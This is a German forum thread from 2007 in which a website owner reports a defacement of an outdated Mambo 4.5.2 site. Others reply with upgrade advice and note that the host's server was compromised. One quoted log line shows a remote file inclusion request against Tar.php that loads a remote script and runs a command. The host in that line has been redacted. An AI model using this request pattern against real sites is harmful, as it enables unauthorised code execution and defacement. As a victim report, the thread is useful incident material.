[verschoben] ACHTUNG! Hackerangriff von ISKORPITX
(mambo 4.5.2)
Wir sind von IS____ITX angegriffen worden.
ALLE index.php und index.html wurden mit folgendem Quelltext überschrieben.
Edit, bitte kein Links zu Hackern posten, und der Quelltext hilft hier zur Klärung auch nicht weiter
Vermutlich gingen die Hacker über dieWenn ich noch mehr herausgefunden habe, dann werde ich das postenPHP-Code:GET /includes/Archive/Tar.php?mosConfig_absolute_path=http://www.kein Links zu gehakten Seiten.us/c57?cmd=id HTTP/1.1
Geändert von holmi (26.02.2007 um 10:44 Uhr)
Ich habe mal die Links usw. raus genommen, wir wollen ja keine Google Werbung für den Typen machen.
Dein Mambo ist hoffnungslos veraltet, da ist ein Angriff vorprogrammiert.
Bei Mambo ist 4.5.5 bzw. 4.6.1 aktuell
http://source.mambo-foundation.org/
Bei Joomla 1.0.12
Björn
Geändert von holmi (26.02.2007 um 10:43 Uhr)
Problem gelöst? Dann markiere den Thread mit [GELÖST]
Dieser Angriff hat (leider) überhaupt nichts mit Lücken in Joomla oder Mambo zu tun. Bei meinem Hoster hat dieser Hacker heute schon zum zweiten mal den gesamten SERVER, also auch Seiten, die nicht mit Joomla arbeiten gehackt. Dabei werden offenbar Sicherheitslücken der Server ausgenutzt.
Nichts desto trotz macht einen ein veraltetetes System natürlich besonders angreifbar. Meins war leider gerade frisch upgedated :(
Berechtigungen
LinkBack URL
About LinkBacks
Zitieren
Lesezeichen